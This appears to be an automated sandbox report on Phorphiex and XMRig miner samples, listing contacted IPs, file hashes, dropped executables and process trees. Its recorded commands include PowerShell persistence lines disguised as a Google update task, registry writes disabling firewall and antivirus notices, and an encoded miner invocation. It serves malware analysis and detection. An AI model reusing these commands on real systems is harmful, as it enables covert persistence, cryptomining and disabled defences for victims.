| IR | 188.158.137.233:40500 | tcp | |
| UA | 93.175.220.40:40500 | udp | |
| VE | 201.243.153.142:40500 | udp |
Files
memory/288-54-0x0000000075B11000-0x0000000075B13000-memory.dmp
memory/876-55-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1028-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\65694274.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1028-63-0x000000013F200000-0x000000013F206000-memory.dmp
memory/1028-64-0x000007FEFBC61000-0x000007FEFBC63000-memory.dmp
memory/1516-65-0x0000000000000000-mapping.dmp
memory/1448-66-0x0000000000000000-mapping.dmp
memory/564-67-0x0000000000000000-mapping.dmp
memory/1584-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\2211424843.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\2211424843.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1192-70-0x0000000000000000-mapping.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
"C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe"
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 3988 -ip 3988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 20.189.173.13:443 | tcp | |
| NL | 87.248.202.1:80 | tcp | |
| NL | 87.248.202.1:80 | tcp | |
| NL | 87.248.202.1:80 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/3988-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/4648-135-0x0000000000150000-0x0000000000171000-memory.dmp
memory/3988-136-0x0000000000400000-0x000000000045D000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2546213664.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3433215875.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winopdvcs.exe" | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2200 set thread context of 3932 | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | C:\Windows\system32\cmd.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
| File created | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
"C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"
C:\Windows\winopdvcs.exe
C:\Windows\winopdvcs.exe
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO7
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | tcp | |
| EG | 154.239.26.183:40500 | tcp | |
| IR | 128.65.172.104:40500 | udp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| YE | 89.189.65.251:40500 | udp | |
| RU | 5.137.85.248:40500 | udp | |
| IR | 2.188.244.75:40500 | udp | |
| IE | 13.69.239.73:443 | tcp | |
| UZ | 87.237.234.24:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| DZ | 41.104.208.77:40500 | udp | |
| IR | 185.120.213.67:40500 | tcp | |
| IR | 46.224.197.251:40500 | udp | |
| UZ | 192.166.229.136:40500 | udp | |
| IR | 151.243.153.175:40500 | udp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| UZ | 213.230.126.64:40500 | udp | |
| IR | 89.43.220.15:40500 | udp | |
| IR | 78.39.225.36:40500 | tcp | |
| IR | 91.185.136.105:40500 | udp | |
| ID | 36.92.205.197:40500 | udp | |
| IR | 2.183.186.130:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| AF | 149.54.15.126:40500 | udp | |
| IR | 2.190.145.188:40500 | udp | |
| UZ | 217.12.85.22:40500 | tcp | |
| AO | 155.89.190.204:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| UZ | 87.237.237.23:40500 | udp | |
| IR | 5.233.167.22:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| EG | 45.241.195.218:40500 | tcp | |
| IR | 5.74.234.250:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| YE | 134.35.229.224:40500 | udp | |
| UZ | 217.30.170.27:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| MX | 201.121.56.96:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| YE | 81.91.27.48:40500 | udp | |
| IR | 5.233.202.172:40500 | tcp | |
| BR | 177.41.160.39:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| IR | 89.43.96.94:40500 | udp | |
| PK | 39.43.104.199:40500 | udp | |
| RU | 185.215.113.84:5050 | tcp | |
| AF | 149.54.15.174:40500 | udp |
Files
memory/2624-132-0x0000000000000000-mapping.dmp
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
memory/1152-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\2546213664.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1320-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/4144-140-0x0000000000000000-mapping.dmp
memory/4144-141-0x000002281EEA0000-0x000002281EEC2000-memory.dmp
memory/4144-142-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/4144-143-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3433215875.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/820-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 00e7da020005370a518c26d5deb40691 |
| SHA1 | 389b34fdb01997f1de74a5a2be0ff656280c0432 |
| SHA256 | a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe |
| SHA512 | 9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 57c0543153b3fdefc25f54368215ae49 |
| SHA1 | faa7e4b52d54b98b6f5a3ddae91142098471fbaa |
| SHA256 | 02601023870ac4c865e1a814771c56cd1e8c65f58cfbc1f995468cff334b861b |
| SHA512 | bfb9eeb7c4e1b166f7706803cc50f584fbdff6b2660ef84b2f56d56c6ede3c93b4f62ccce213c6cd638304f04a4ddb69fa4b96a947a8a8b30d5d9e19f3fc8dde |
memory/820-148-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/4640-149-0x0000000000000000-mapping.dmp
memory/820-150-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
memory/1648-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 143a478fb47996f74bbbcdaa252b9e0b |
| SHA1 | 288893a45c1c50f8245a32aa06dfb1ac2ff31c83 |
| SHA256 | 6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b |
| SHA512 | e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8 |
memory/1648-154-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/1648-155-0x00007FFBC87A0000-0x00007FFBC9261000-memory.dmp
memory/3776-156-0x0000000000000000-mapping.dmp
memory/3616-157-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
| MD5 | fdba80d4081c28c65e32fff246dc46cb |
| SHA1 | 74f809dedd1fc46a3a63ac9904c80f0b817b3686 |
| SHA256 | b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398 |
| SHA512 | b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29 |
memory/3932-159-0x00007FF6D87125D0-mapping.dmp
memory/3932-160-0x0000022392D40000-0x0000022392D60000-memory.dmp
memory/3932-161-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp
memory/3932-162-0x00007FF6D7F20000-0x00007FF6D8714000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
153s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\489331092.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
